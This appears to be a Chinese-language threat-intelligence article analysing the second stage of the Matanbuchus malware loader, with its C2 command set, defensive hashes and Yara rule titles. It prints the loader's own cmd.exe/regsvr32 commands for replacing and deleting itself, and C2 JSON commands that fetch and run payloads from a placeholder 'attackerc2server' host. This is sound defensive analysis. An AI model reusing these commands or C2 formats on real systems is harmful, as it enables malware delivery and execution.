关键词
Matanbuchus加载器、恶意软件即时服务(MaaS)、恶意软件
Matanbuchus是一种恶意软件即服务(MaaS)加载器,在黑市上已经流传了一年多。Matanbuchus被认为是一种加载类型的恶意软件,用于在目标环境中下载和执行恶意软件载荷。Matanbuchus加载器包含两个阶段,但是此前只有第一个阶段得到了深入分析。
这篇博客文章将阐明Matanbuchus的主要阶段,即加载的第二阶段。第二阶段的加载更加有趣,因为它涉及许多载荷加载技术。本文通过对加载器的特性和功能的分析,确定Matanbuchus是一个恶意软件加载器。
-
检查失陷主机并解密下一阶段的(主)加载器 -
连接到C2以取得加密密钥并解密下一阶段的攻击程序 -
下载并解密攻击载荷并执行。
图1 Matanbuchus 加载器在一个俄罗斯地下论坛上出售
图2 Matanbuchus加载其的初始加载阶段主要工作流程
-
运行可执行文件(可以带参数也可以不带参数) -
作为管理员运行DLL(使用rundll32.exe或regsvr32.exe) -
运行脚本命令–CMD和Powershell命令 -
从内存运行PE文件(无文件) -
更新恶意软件的每个部分 -
卸载加载器 -
睡眠
图3 Matanbuchus加载器第二阶段的主要工作流程
图4 CIS检查流程的一部分
图5 检查是否安装了Opera web浏览器
图6 第二阶段DllRegiesterServer 工作流程
图7 检查进程权限
图8 获取DNS域名
图9 构建发送数据的过程
图10 使用POST请求发送给C2服务器的受害者机器信息
图11 解密的C2服务器命令
图12 下载payload到磁盘的函数的一部分
图13 UAC窗口,用于以管理员权限运行负载
(8)使用Rundll32运行DLL
图14 创建Rundll32.exe进程
图15 创建一个新线程,将负载以无文件方式运行
cmd.exe /c timeout /t 3 &&
move/Y %ProgramData%\F1B2503007FE48B68E2406AD42928F5A\.ocx %ProgramData%\F1B2503007FE48B68E2406AD42928F5A\%PROCESSOR_REVISION%.ocx &&
regsvr32.exe -e -n -i:"%PROCESSOR_REVISION%.ocx" %ProgramData%\F1B2503007FE48B68E2406AD42928F5A\%PROCESSOR_REVISION%.ocx
代码段1:覆盖初始加载器
cmd.exe /c timeout /t 3 && del %ProgramData%\F1B2503007FE48B68E2406AD42928F5A\%PROCESSOR_REVISION%.ocx &&
代码段2:删除加载器的工作文件夹
命令 |
C2 命令名称 |
命令详情 |
Run executable |
Running exe |
{ “hszA”: “Running exe”, “rJqU”: “https://attackerc2server/payload“, “nX8y”: “c2_cmd_flag” } |
Run executable with parameters |
Starting the exe with parameters |
{ “hszA”: “Starting the exe with parameters”, “rJqU”: “https://attackerc2server/payload& cmdline”, “nX8y”: “c2_cmd_flag” } |
Run executable with admin rights |
Run EXE with admin rights |
{ “hszA”: “Run EXE with admin rights”, “rJqU”: “https://attackerc2server/payload“, “nX8y”: “c2_cmd_flag” } |
Run DLL using Rundll32 |
RunDll32 & Execute |
{ “hszA”: “RunDll32 & Execute”, “rJqU”: “https://attackerc2server/payload&exported_func_name_or_ord”, “nX8y”: “c2_cmd_flag” } |
Run DLL using Regsvr32 |
Regsvr32 & Execute |
{ “hszA”: “Regsvr32 & Execute”, “rJqU”: “https://attackerc2server/payload“, “nX8y”: “c2_cmd_flag” } |
Run CMD command |
Run CMD in memory |
{ “hszA”: “Regsvr32 & Execute”, “rJqU”: “https://attackerc2server/payload“, “nX8y”: “c2_cmd_flag” } |
Run PowerShell command |
Run PS in memory |
{ “hszA”: “Run PS in memory”, “rJqU”: “https://attackerc2server/payload“, “nX8y”: “c2_cmd_flag” } |
Run PE within memory |
MemLoadD llMain || MemLoadExe |
{ “hszA”: “MemLoadDllMain || MemLoadExe”, “rJqU”: “https://attackerc2server/payload“, “nX8y”: “c2_cmd_flag” } |
Run DLL within memory |
Running dll in memory #2 (DllRegisterServer) |
{ “hszA”: “Running dll in memory #2 (DllRegisterServer)”, “rJqU”: “https://attackerc2server/payload“, “nX8y”: “c2_cmd_flag” } |
Run DLL within memory |
Running dll in memory #3 (DllInstall(Install)) |
{ “hszA”: “Running dll in memory #3 (DllInstall(Install))”, “rJqU”: “https://attackerc2server/payload“, “nX8y”: “c2_cmd_flag” } |
Run DLL within memory |
Running dll in memory #3 (DllInstall(Unstall)) |
{ “hszA”: “Running dll in memory #3 (DllInstall(Unstall))”, “rJqU”: “https://attackerc2server/payload“, “nX8y”: “c2_cmd_flag” } |
Loader update |
Crypt update & Bots upgrade |
{ “hszA”: “Crypt update & Bots upgrade”, “rJqU”: “https://attackerc2server/payload“, “nX8y”: “c2_cmd_flag” } |
Uninstall |
Uninstall |
{ “hszA”: “Uninstall”, “rJqU”: “https://attackerc2server/payload“, “nX8y”: “c2_cmd_flag” } |
Sleep |
Sleep – Default function |
{ “hszA”: “b2tb” } |
(1)主要阶段Hashes
-
0e12e3135f1891b47caf5a4df67a19d96a5bb9d37b1fdff02149e8e6d5ddbb1c 7631546efbeca850698133ee79732bc276ee601ac479fa85bebb938b0fe7fef5 2ef601d3598e90d4e1d5793b4c562fc4ed0cc47c64ff662968a1a8fe1eb70a0e c41f7b7ec0909d5c21107ddebc2fe84dbc137f701b42943c1a5e69f5d50e05ab b9b399dbb5d901c16d97b7c30cc182736cd83a7c53313194a1798d61f9c7501e af6e30959bcc2e034de7c3f5d146b52c54f7343defd01d95e2e3887a62aaabef 556f02ed0c930fc89b898f53a4a670f002ea62c7e8a7f5c2b1740d459284ff5c ef23785e2299720a6d8e15f60b4f84a42f58f5140959597e46d14ed86b4a205d 2cf53513a84c5fe62adf8ae7bbfd5a707ecadd5f47f653fcee26c93362ea83cc 8c2be4fef0c0cda93bfc8b3857465540012e7f20f9dc3dd0cdf723a62a006a5e
(2)初始阶段Hashes
-
3bbf58809f6c221652c924e5091b797a5de1148f594b3084d1f54505bf36c6d3 2ed8d7ca0c848699a4a419d434d7fd0e84b7aaadc48b40340e8b8fab9f096d2e 10324295e9e90de22a3204273a28612ef3e72b9ae78c44466e69cb7306b0cffd 6cb30172d4154a89356f5b3bf2b843b94e7e727e4ff90ccb908be7ec1d536f04 9f3a3eb7f9ae763d57731edb33aa9781f51124a70467d0c67b47c5a0be104909 f2b7f9a4bc539ca1abd84b0b7a07853cad7f86e3a66d0e7d050b610c4b2ac7fe 77ef1660d04aebbfcb5506b445c73a60572523741d326aef8e3209326428b501 67dece0c0ef7d6d03f880e73e853f55d0c805dd389896178e7835c364062892e 32814d7581dcbcfeca8fce229bdb12bf92f006aea54c3f393cbbef341c897877 7706ea3a2696393475ef819d8bc0244f6e19c5e08bcc3ce8240571ab74381818 f57dba3c38c19844a1a8a422ae7c7437ee409f4f88dea4ad756dce5a9fa01d8b 9d2f0573033def03d2a91c74337379c77132ca4624120e2f2220bc50bcbe9a7c
(3)Yara规则
Matanbuchus Loader Initial Stage Yara Rule
Matanbuchus Loader Main Stage Yara Rule
IoCs
Matanbuchus Loader IoCs
编辑|林飞
审校|何双泽、金矢
本文为CNTIC编译整理,不代表本公众号观点,转载请保留出处与链接。联系信息进入公众号后点击“关于我们”可见。
原文始发于微信公众号(国家网络威胁情报共享开放平台):深入分析Matanbuchus加载器的加载技术和技巧
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论